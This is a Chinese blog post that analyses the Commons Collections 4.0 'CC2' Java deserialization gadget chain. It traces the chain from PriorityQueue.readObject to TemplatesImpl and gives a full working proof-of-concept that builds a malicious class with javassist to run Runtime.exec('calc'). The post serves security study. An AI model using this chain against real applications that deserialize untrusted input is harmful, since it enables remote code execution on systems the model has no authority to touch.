commons-collections2(cc2)反序列化链分析

最新推荐文章于 2024-07-08 17:50:45 发布
最新推荐文章于 2024-07-08 17:50:45 发布
阅读量3.2k 收藏 1
点赞数 3
分类专栏: java安全 java cc链 文章标签: java 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54648419/article/details/122911910
版权
java安全 同时被 3 个专栏收录
15 篇文章 6 订阅
订阅专栏
java
9 篇文章 1 订阅
订阅专栏
cc链
3 篇文章 0 订阅
订阅专栏

commons-collections2

大的思路是将恶意参数放到TemplatesImpl类中的_bytecodes属性中,反射构造PriorityQueue队列的comparatorqueue两个字段,将PriorityQueue队列的comparator字段设置为TransformingComparator(和cc1有点像的地方),然后将queue字段设置为TemplatesImpl对象,执行触发利用链。

环境配置

jdk1.7.80
Commons Collections 4.0

    <dependencies>
    <dependency>
        <groupId>org.apache.commons</groupId>
        <artifactId>commons-collections4</artifactId>
        <version>4.0</version>
    </dependency>
    <dependency>
        <groupId>org.javassist</groupId>
        <artifactId>javassist</artifactId>
        <version>3.25.0-GA</version>
    </dependency>
    </dependencies>

知识

javassit

Java 字节码以二进制的形式存储在 .class 文件中,每一个 .class 文件包含一个 Java 类或接口。Javaassist 就是一个用来 处理 Java 字节码的类库。它可以在一个已经编译好的类中添加新的方法,或者是修改已有的方法,并且不需要对字节码方面有深入的了解。同时也可以去生成一个新的类对象,通过完全手动的方式。
Java安全之Javassist动态编程
10-java安全基础——javassist字节码编程

编程常用的类:
ClassPoolClassPool 类可以控制的类的字节码,例如创建一个类或加载一个类,与 JVM 类装载器类似
CtClassCtClass提供了类的操作,如在类中动态添加新字段、方法和构造函数、以及改变类、父类和接口的方法
CtField:类的属性,通过它可以给类创建新的属性,还可以修改已有的属性的类型,访问修饰符等
CtMethod:表示类中的方法,通过它可以给类创建新的方法,还可以修改返回类型,访问修饰符等, 甚至还可以修改方法体内容代码
CtConstructor:用于访问类的构造,与CtMethod类的作用类似

PriorityQueue

实现了Queue接口,通过堆实现,具体说是通过二叉小顶堆实现在数列中对元素的操作

构造方法:
PriorityQueue()           
	使用默认的初始容量(11)创建一个 PriorityQueue,并根据其自然顺序对元素进行排序。
PriorityQueue(int initialCapacity)
	使用指定的初始容量创建一个 PriorityQueue,并根据其自然顺序对元素进行排序。
常见方法:
add(E e)           			将指定的元素插入此优先级队列
clear()            			从此优先级队列中移除所有元素。
comparator()       			返回用来对此队列中的元素进行排序的比较器;如果此队列根据其元素的自然顺序进行排序,则返回 null
contains(Object o)          如果此队列包含指定的元素,则返回 trueiterator()           		返回在此队列中的元素上进行迭代的迭代器。
offer(E e)           		将指定的元素插入此优先级队列
peek()           			获取但不移除此队列的头;如果此队列为空,则返回 nullpoll()           			获取并移除此队列的头,如果此队列为空,则返回 nullremove(Object o)           	从此队列中移除指定元素的单个实例(如果存在)。
size()           			返回此 collection 中的元素数。
toArray()          			返回一个包含此队列所有元素的数组。

原理分析

ysoserial中给出的链

ObjectInputStream.readObject()
			PriorityQueue.readObject()
				...
					TransformingComparator.compare()
						InvokerTransformer.transform()
							Method.invoke()
								Runtime.exec()

java.util.PriorityQueue类中的readObject方法开始

在这里插入图片描述

首先是调用默认的 ObjectInputStream.defaultReadObject() 方法 ,把序列化的文件进行反序列化去读取数据,然后调用 ObjectInputStream.readInt() 方法读取优先级队列的长度,queue[i]的值是由s.readObject()得到,这里是在writeObject()处写入了对应的内容
在这里插入图片描述
这里可以通过反射来设置queue[i]的值,也就是queue[i]的值是可控的(queue[i]字段用来写入TemplatesImpl对象)。最后进入heapify()方法中
在这里插入图片描述
进入for循环需要一个条件,size >>> 1,也就是对size进行了右移位操作,那么就是size>1的时候才会进入循环,继续跟进siftDown()
在这里插入图片描述

这里的x即为queue[i],跟进siftDownUsingComparator方法。
在这里插入图片描述

这里x就是我们传入的queue[i],而这里的comparator接口调用了TransformingComparator中重写的compare方法
在这里插入图片描述
这里调用了this.transformertransform方法,跟进去,input就是前面的obj1,this.iMethodName的值为传入的newTransformer
在这里插入图片描述
因为newTransformer方法中调用到了getTransletInstance方法
在这里插入图片描述
继续跟到getTransletInstance方法中,如果_name不为空(通过反射将_name属性设置为恶意类TestTemplatesImpl的类名),_class为空,则调用defineTransletClasses方法
在这里插入图片描述
继续跟进defineTransletClasses方法,通过loader.defineClass还原class对象,判断当前class对象是否继承了AbstractTranslet类并设置_transletIndex索引。这里必须继承类,否则_transletIndex值默认为-1

在这里插入图片描述

_transletIndex赋值后,返回到getTransletInstance方法,创建_class[_transletIndex]的对象,即创建恶意类的对象,那么该类中的static代码就会执行。
在这里插入图片描述

poc分析

这条链补完整的化应该是这样。

ObjectInputStream.readObject()
PriorityQueue.readObject()
PriorityQueue.heapify()
PriorityQueue.siftDown()
PriorityQueue.siftDownUsingComparator()
TransformingComparator.compare()
InvokerTransformer.transform()
Method.invoke()
TemplatesImpl.newTransformer()
TemplatesImpl.getTransletInstance()
TemplatesImpl.defineTransletClasses
newInstance()
Runtime.exec()

pocpocpoc

import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;


import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;


public class exp {
    public static void main(String[] args) throws Exception {
        String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";
        String TemplatesImpl="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";

        ClassPool classPool=ClassPool.getDefault();//返回默认的类池
        classPool.appendClassPath(AbstractTranslet);//添加AbstractTranslet的搜索路径
        CtClass payload=classPool.makeClass("cc2");//创建一个新的public类
        payload.setSuperclass(classPool.get(AbstractTranslet));  //设置父类为AbstractTranslet
        payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");"); //创建一个空的类初始化,设置构造函数主体为runtime

        byte[] bytes=payload.toBytecode();//转换为byte数组

        Object templatesImpl=Class.forName(TemplatesImpl).getDeclaredConstructor(new Class[]{}).newInstance();//反射创建TemplatesImpl
        Field field=templatesImpl.getClass().getDeclaredField("_bytecodes");//反射获取templatesImpl的_bytecodes字段
        field.setAccessible(true);//暴力反射
        field.set(templatesImpl,new byte[][]{bytes});//将templatesImpl上的_bytecodes字段设置为runtime的byte数组

        Field field1=templatesImpl.getClass().getDeclaredField("_name");//反射获取templatesImpl的_name字段
        field1.setAccessible(true);//暴力反射
        field1.set(templatesImpl,"test");//将templatesImpl上的_name字段设置为test

        InvokerTransformer transformer=new InvokerTransformer("newTransformer",new Class[]{},new Object[]{});
        TransformingComparator comparator =new TransformingComparator(transformer);//使用TransformingComparator修饰器传入transformer对象
        PriorityQueue queue = new PriorityQueue(2);//使用指定的初始容量创建一个 PriorityQueue,并根据其自然顺序对元素进行排序。
        queue.add(1);//添加数字1插入此优先级队列
        queue.add(1);//添加数字1插入此优先级队列

        Field field2=queue.getClass().getDeclaredField("comparator");//获取PriorityQueue的comparator字段
        field2.setAccessible(true);//暴力反射
        field2.set(queue,comparator);//设置queue的comparator字段值为comparator

        Field field3=queue.getClass().getDeclaredField("queue");//获取queue的queue字段
        field3.setAccessible(true);//暴力反射
        field3.set(queue,new Object[]{templatesImpl,templatesImpl});//设置queue的queue字段内容Object数组,内容为templatesImpl

        ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("test.out"));
        outputStream.writeObject(queue);
        outputStream.close();

        ObjectInputStream inputStream=new ObjectInputStream(new FileInputStream("test.out"));
        inputStream.readObject();

    }
}
第一部分
  ClassPool classPool=ClassPool.getDefault();//返回默认的类池
        classPool.appendClassPath(AbstractTranslet);//添加AbstractTranslet的搜索路径
        CtClass payload=classPool.makeClass("cc2");//创建一个新的public类
        payload.setSuperclass(classPool.get(AbstractTranslet));  //设置父类为AbstractTranslet
        payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");

创建动态类、设置父类、添加命令执行内容。这里设置必须设置父类的原因前面也有提到,如果没有继承的话,_transletIndex索引的值默认为-1,那么getTransletInstance方法中_class属性调用newInstance方法实例化类的时候就会失败,也就无法成功命令执行

第二部分
 Object templatesImpl=Class.forName(TemplatesImpl).getDeclaredConstructor(new Class[]{}).newInstance();//反射创建TemplatesImpl
        Field field=templatesImpl.getClass().getDeclaredField("_bytecodes");//反射获取templatesImpl的_bytecodes字段
        field.setAccessible(true);//暴力反射
        field.set(templatesImpl,new byte[][]{bytes});//将templatesImpl上的_bytecodes字段设置为runtime的byte数组

        Field field1=templatesImpl.getClass().getDeclaredField("_name");//反射获取templatesImpl的_name字段
        field1.setAccessible(true);//暴力反射
        field1.set(templatesImpl,"test");//将templatesImpl上的_name字段设置为test

反射获取_bytecodes的值,设置为转换后的payload的字节码,因为有load.defineclass还原class的操作,这里也就通过反射改想要执行命令的地方。_name也是一样的方式,这里设置为test。

第三部分
InvokerTransformer transformer=new InvokerTransformer("newTransformer",new Class[]{},new Object[]{});

TransformingComparator comparator =new TransformingComparator(transformer);

InvokerTransformer方法调用newTransformer,再用TransformingComparatorcompare方法会去调用传入参数的transform方法,而满足compare的办法就需要用到PriorityQueue来实现了。

PriorityQueue queue = new PriorityQueue(2);
        queue.add(1);
        queue.add(1);

        Field field2=queue.getClass().getDeclaredField("comparator");
        field2.setAccessible(true);
        field2.set(queue,comparator);

这里add两个1是为了满足heapify()中的(int i = (size >>> 1) - 1; i >= 0; i--),这样经过计算刚好为0,满足条件

第四部分
Field field3=queue.getClass().getDeclaredField("queue");
field3.setAccessible(true);
field3.set(queue,new Object[]{templatesImpl,templatesImpl});

设置queue为Object[]数组,内容为两个内置恶意代码的TemplatesImpl实例化对象。这样调用heapify方法里面的时候就会进行传参进去。

参考Java安全之Commons Collections2分析
参考8-java安全——java反序列化CC2链分析

Matat4
关注
专栏目录
Java反序列化-CC2、4分析
The_W0rld的博客
07-22 1365
CC2中,使用的将不是前面的commons-collections依赖了,而是commons-collections4这个依赖,并且也采取了一下新的利用类PriorityQueue和TransformingComparator。通过PriorityQueue做为入口点,TransformingComparator作为跳板去触发利用链。...
Java反序列化Commons-Beanutils1链与无 commons-collections的Shiro反序列化利用
weixin_45682070的博客
02-11 1557
Apache Commons Beanutils 首先看一下 Commons Beanutils包,Apache Commons Beanutils 是 Apache Commons 工具集下的另一个项目,它提供了对普通Java类对象(也称为JavaBean)的一些操作方法。 JavaBean可以简单的理解为一个Java类对象。 commons-beanutils中提供了一个静态方法 PropertyUtils.getProperty ,让使用者可以直接调用任意JavaBean的getter方法,看面的de
Java安全研究——反序列化漏洞之CC2
weixin_43889136的博客
05-10 1674
0x01
CC2利用链分析
最新发布
07-08 464
JDK 8u65环境配置参考。
Commons-Collections篇-CC2链分析
鸣蜩十四的博客
06-17 931
CC2链主要和CC4一样,但是区别在于CC2避免了使用Transformer数组,没有使用InstantiateTransformer类进行初始化,主要分析中间连接部分也就是CC2链重心。
CC2链分析与复现
weixin_42974824的博客
08-25 1057
CC2链分析与复现
commons-collections-3.2.2-
11-01
反序列化是将已序列化的对象状态还原为可执行对象的过程,如果这个过程没有得到适当的验证,攻击者可以构造恶意的序列化数据,导致安全问题。 为了修补这个漏洞,我们需要将WebLogic服务器中旧版本的Apache Commons...
java反序列化Commons-Collections2链分析
weixin_45682070的博客
01-12 696
环境 JDK 1.7 Commons Collections 4.0 javassit maven所需pom <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.0</version> </dependency> <dep
commons-collections4-4.1
11-01
Apache Commons Collections 3.2.0及更早版本中存在这样一个漏洞,因为该库包含了一些不安全的反序列化方法,使得攻击者可以通过精心构造的输入来触发代码执行。 在Apache Commons Collections 4.1中,这个问题得到...
commons-collections4-4.4-bin.zip
06-07
支持集合的序列化和反序列化,这在数据持久化和网络传输中非常有用。 9. **算法**: 包含一些通用的算法,如`Frequencies`统计集合中元素出现的频率,`ForEach`遍历并执行操作,`Partition`将集合分割成满足特定...
apache-commons-collections2反序列化链分析
12-01 708
apache-commons-collections2反序列化链分析 在审计完apache-commons-collections1反序列化链之后,继续审计apache-commons-collections系列的反序列化链,下面根据ysoserial工具生成CommonsCollections2反序列化链payload的思路一步步分析 前景知识 ysoserial工具生成payload的时候用到了动态生成类和PriorityQueue队列,之前也没接触过,下面简单记录一下 JAVAssite动态生成类 百
【Web】Java反序列化CC2——commons-collections4的新链之一
uuzeray的博客
03-01 662
而siftDownUsingComparator内部会调用构造方法传入的comparator的compare方法,此时我们只要令comparator为TransformingComparator即可完成利用链的调用。API 设计:commons-collections4 重新设计了 API,并且引入了一些新的功能和改进,同时也修复了一些旧版本中存在的 bug。安全性增强:commons-collections4 引入了更多的安全性措施,以防止常见的安全漏洞。最后调用了heapify方法。
[Java反序列化]—CommonsCollections2
Sentiment的博客
06-03 599
CommonsCollections4中通过的方法进行了最后的调用,但是通过这种方式的话会存在一个数组的问题,在shiro等应用中会受到一些影响,所以在CC2中就使用代替了之前的数组部分,算是进行了一个优化 分析 整条流程跟CC4差不多,就简单分析下有差异的部分:CC4: CC2: 简单回溯下看看过程:最后要通过调用 所以在实例化时,就需要给定方法名,即构造: 之后他要调用的是的方法,所以上边的的input参数就需要是,而往上看一下哪里调用的 是在compare中调用的,而这两个obj的值,就是通过add
Java安全 CC链2分析
Elite的博客
03-16 1243
CC2链适用于Apache common collection 4.0版本,由于该版本对AnnotationInvocationHandler类的readObject方法进行了修复,导致cc链1无法使用,故产生了cc链2,cc链2与cc链3相似,都使用了字节码的加载,并且后续的触发链也基本相同
ysoserial-cc2 java反序列化
springgold的博客
09-02 250
yso-cc2 1从入口看 1) 2) 3)createTemplatesImpl方法,与jdk7u21的利用类相同 public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory ) throws Exception { f
CC2链分析
sunyufei_666的博客
08-11 146
所以可以采用CC1方法,在对象实例化的时候不添加comparator对象,添加玩元素后再通过反射传入comparator对象,这样没有comparator对象后,siftUp方法执行后会进入siftUpComparable方法,这里不会调用compare方法,可以避免触发调用计算器。这两个方法都会调用compare方法,只是第一个方法是 key对象进行调用,第二个方法是comparator对象调用。该类是类转换比较器,构造器中存放Transfomer,compare方法中调用了transform。
漫谈Commons-Collections反序列化
热门推荐
Summer's blog
06-02 1万+
Java组件Commons-Collections被广泛用于各大系统中,在几年前的被爆出反序列化漏洞,从此打开了Java安全的大门。全网最易懂的反序列化分析文章,花了大量的流程图帮助理解。
浅谈Commons-Collections1 反序列化
Le1a's Blog
03-23 641
Java CC链
Java 反序列化 - commons collection 之困(一)
weixin_43873557的博客
02-11 216
01多余的碎碎念 说到 java 反序列化,去搜索的话能看到网上有很多分析关于 commons collection 利用链的文章,emm 我一开始看不懂,看到很多代码的图头晕。 这篇文章的话其实是我跟着 p 神的文章一路走下来的,所以整个逻辑会按照 p 神的文章走。那对于反射、动态代理也有一些自己的理解,所以就记录下来。希望也给你们多一个角度的理解。 02反射 为什么要先讲反射?因为你去看他的利用链的实现,会发现都会运用到反射。 java 中有两个类用来执行命令,一个是 Runtime ,一个是 Proc
掌握commons-lang与commons-collections增强Java编程
这个库通过引入一系列的功能,扩展了java.lang包,使得开发者可以更便捷地处理字符串、基本数值、对象反射、并发性、创建和序列化以及系统属性等问题。例如,在处理字符串时,Lang库提供了大量的字符串操作方法,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值